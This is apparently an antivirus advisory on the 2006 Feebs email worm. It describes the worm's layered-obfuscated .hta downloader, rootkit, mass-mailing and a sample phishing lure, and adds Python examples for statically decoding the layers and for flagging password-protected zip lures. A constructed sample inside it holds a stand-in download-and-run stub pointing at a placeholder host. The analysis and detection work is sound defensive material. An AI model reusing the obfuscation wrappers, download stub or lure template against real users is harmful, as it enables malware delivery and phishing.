JS/Feebs.fam!worm - Released Aug 03, 2006

Detection Availability

              Active Database   Extended Database
FortiGate     low               high
FortiClient
FortiMail     N/A

Visible Symptoms

Detailed Analysis

JS/Feebs.fam!worm - 06-08-03


Network/Internet:

  • Connects to Server: HTTP
  • Other Payloads: Downloads updates

More Info:

In-depth
--------

Feebs appeared in December 2005. It is an old-fashioned worm, designed
to be annoying and destructive rather than stealthy, unlike most modern
threats.

It is made up of 2 parts:
- the downloader, written in JavaScript and embedded inside an .hta
  file;
- the worm itself, downloaded by the JavaScript part and executed on
  the system.

The downloader contains several layers of encryption (usually 2 or 3),
each of them containing the algorithm used to decode the layer below.
The bottom layer contains the actual code for the downloader.
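The layered structure described above is what an analyst has to unwind before the downloader's real code (and the URL it fetches from) becomes visible. The following is an added example, not Fortinet's code and not code taken from the worm: it builds a constructed two-layer sample using the eval(unescape("...")) and eval(String.fromCharCode(...)) idioms, then peels the layers statically with regular expressions, so nothing is ever executed. The stub code, URL and function name fetchAndRun are invented for the sample.

```python
import re
import urllib.parse

# Constructed sample: a downloader stub wrapped in two decoder layers, mimicking the
# eval(unescape(...)) / eval(String.fromCharCode(...)) wrappers seen in this kind of .hta.
INNER_STUB = 'var u = "http://update.example.invalid/w.exe"; fetchAndRun(u);'


def wrap_unescape(code):
    """Wrap code as eval(unescape("%XX...")) (used only to build the sample)."""
    return 'eval(unescape("' + ''.join('%%%02X' % b for b in code.encode()) + '"))'


def wrap_fromcharcode(code):
    """Wrap code as eval(String.fromCharCode(n, n, ...)) (used only to build the sample)."""
    return 'eval(String.fromCharCode(' + ','.join(str(b) for b in code.encode()) + '))'


SAMPLE_HTA_SCRIPT = wrap_unescape(wrap_fromcharcode(INNER_STUB))

# Each pattern recognises one decoder idiom when it makes up the whole layer.
UNESCAPE_RE = re.compile(
    r'^\s*eval\(\s*unescape\(\s*"((?:%[0-9A-Fa-f]{2})*)"\s*\)\s*\)\s*;?\s*$')
FROMCHARCODE_RE = re.compile(
    r'^\s*eval\(\s*String\.fromCharCode\(\s*([0-9,\s]+)\)\s*\)\s*;?\s*$')


def peel_once(layer):
    """Statically decode one wrapper layer without executing any script.
    Returns the inner code, or None if no known decoder idiom matches."""
    m = UNESCAPE_RE.match(layer)
    if m:
        return urllib.parse.unquote(m.group(1))
    m = FROMCHARCODE_RE.match(layer)
    if m:
        return ''.join(chr(int(n)) for n in m.group(1).split(',') if n.strip())
    return None


def peel_layers(script, max_layers=10):
    """Return the layers outermost first; the last element is the bottom layer
    (the actual downloader code, or whatever could not be peeled)."""
    layers = [script]
    while len(layers) <= max_layers:
        inner = peel_once(layers[-1])
        if inner is None:
            break
        layers.append(inner)
    return layers


def extract_urls(code):
    """Pull plain http(s) URLs out of decoded code for triage or blocklisting."""
    return re.findall(r'https?://[^\s"\'<>]+', code)


if __name__ == '__main__':
    layers = peel_layers(SAMPLE_HTA_SCRIPT)
    print(len(layers))                  # 3
    print(extract_urls(layers[-1]))     # ['http://update.example.invalid/w.exe']
```

Real samples use more idioms than these two (string reversal, custom substitution loops, split-and-join tricks), so in practice each new idiom gets its own peel_once branch; the point of keeping the unwrapping static is that the analyst never has to run attacker script to learn what it downloads.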

The worm itself contains a rootkit, P2P propagation, reporting via ICQ
and on-the-fly injection into emails sent by the user (with MS Outlook).
It also embeds a polymorphic engine that modifies the JavaScript code of
the downloader; it then mass-mails the new .hta files, thus spreading
new variants of Feebs.


Replication
-----------

Feebs arrives by email, as a password-protected zip file attachment.

The email looks like an automated message originating from an online
email service, such as AOL or Hotmail: the sender address is spoofed
and the text is written in an informal, terse style. The body of the
message contains the password to decompress the zip file.

A typical email looks like:

----------------------------------------
From : n23761@gmail.com
To : mary2000@hotmail.com
Subject : Secure E-mail from Gmail.com user.

ID : 44156
Password : tayqvgdff

Message is attached.

Thank you,
Protected Mail System,
Gmail co
----------------------------------------

A system infected with Feebs will mass-mail the newly modified .hta file
to addresses harvested from the user's contact list, and to addresses
generated from a list of keywords.

To relay its messages, Feebs contacts public mail servers (such as Gmail
or mail.com) along with servers from the domain names it just found in
the contact list.

It also silently attaches itself as a zip file (without password) to
every email with an attachment sent by the user.
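Both delivery paths in this section share a shape a mail gateway can check for: a zip attachment that is password-protected while the password sits in the message body, or a zip (protected or not) that carries an .hta or other script/executable entry. The following is an added example, not Fortinet's code: it builds two constructed messages with Python's email and zipfile modules (the lure is shaped like the sample email above; the "encrypted" archive only has the ZIP encryption flag bit set in its headers, which is all a header-based check looks at) and runs a small heuristic over them. The extension list and the finding names are this example's own choices.

```python
import email
import email.policy
import io
import re
import zipfile
from email.message import EmailMessage

# Entry types a mail gateway would not expect inside a "secure message" archive (example's choice).
RISKY_EXT = ('.hta', '.js', '.vbs', '.exe', '.scr')
# A "Password : xxxx" line in the body, as in the lure shown above.
PASSWORD_RE = re.compile(r'^\s*password\s*:\s*\S+', re.IGNORECASE | re.MULTILINE)


def _set_encryption_bit(raw, signature, flag_offset):
    """Set bit 0 of the general-purpose flag word in every header with this signature."""
    pos = raw.find(signature)
    while pos >= 0:
        raw[pos + flag_offset] |= 0x01
        pos = raw.find(signature, pos + 4)


def make_zip(entries, encrypted=False):
    """Build a ZIP from {name: bytes}. With encrypted=True the encryption flag is set so
    the archive *looks* password-protected (contents are not really encrypted; this is a
    constructed sample, enough for a header-based check)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    raw = bytearray(buf.getvalue())
    if encrypted:
        _set_encryption_bit(raw, b'PK\x03\x04', 6)   # local file headers
        _set_encryption_bit(raw, b'PK\x01\x02', 8)   # central directory headers
    return bytes(raw)


def build_message(sender, recipient, subject, body, zip_bytes, zip_name):
    """Assemble a plain-text message with one ZIP attachment (constructed sample)."""
    msg = EmailMessage()
    msg['From'] = sender
    msg['To'] = recipient
    msg['Subject'] = subject
    msg.set_content(body)
    msg.add_attachment(zip_bytes, maintype='application', subtype='zip', filename=zip_name)
    return msg.as_bytes()


def assess(raw_email):
    """Return (finding, attachment_name) pairs for the Feebs-style lure: a password-protected
    ZIP whose password is printed in the body, or a ZIP carrying script/executable entries."""
    msg = email.message_from_bytes(raw_email, policy=email.policy.default)
    body_part = msg.get_body(preferencelist=('plain', 'html'))
    body_text = body_part.get_content() if body_part is not None else ''
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ''
        if not name.lower().endswith('.zip'):
            continue
        data = part.get_payload(decode=True)
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                infos = zf.infolist()   # entry names are readable even when entries are encrypted
        except zipfile.BadZipFile:
            findings.append(('malformed-zip', name))
            continue
        encrypted = any(zi.flag_bits & 0x01 for zi in infos)
        if encrypted and PASSWORD_RE.search(body_text):
            findings.append(('password-in-body', name))
        if any(zi.filename.lower().endswith(RISKY_EXT) for zi in infos):
            findings.append(('script-in-zip', name))
    return findings


# Constructed samples: a lure shaped like the email shown above, and a benign message.
LURE = build_message(
    'n23761@gmail.com', 'mary2000@hotmail.com', 'Secure E-mail from Gmail.com user.',
    'ID : 44156\nPassword : tayqvgdff\n\nMessage is attached.\n',
    make_zip({'message.hta': b'<html><script>/* constructed stub */</script></html>'}, encrypted=True),
    'message.zip')
BENIGN = build_message(
    'alice@example.invalid', 'bob@example.invalid', 'Q3 figures',
    'Hi Bob, the spreadsheet export is attached.\n',
    make_zip({'q3.csv': b'region,revenue\nnorth,12\n'}),
    'q3.zip')

if __name__ == '__main__':
    print(assess(LURE))    # [('password-in-body', 'message.zip'), ('script-in-zip', 'message.zip')]
    print(assess(BENIGN))  # []
```

The encryption bit is checked rather than attempting extraction because a gateway cannot open the archive anyway; the entry names in the central directory are enough to see an .hta inside, which also covers the unprotected copies the worm adds to the user's own outgoing mail.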

Reference: ID - 270781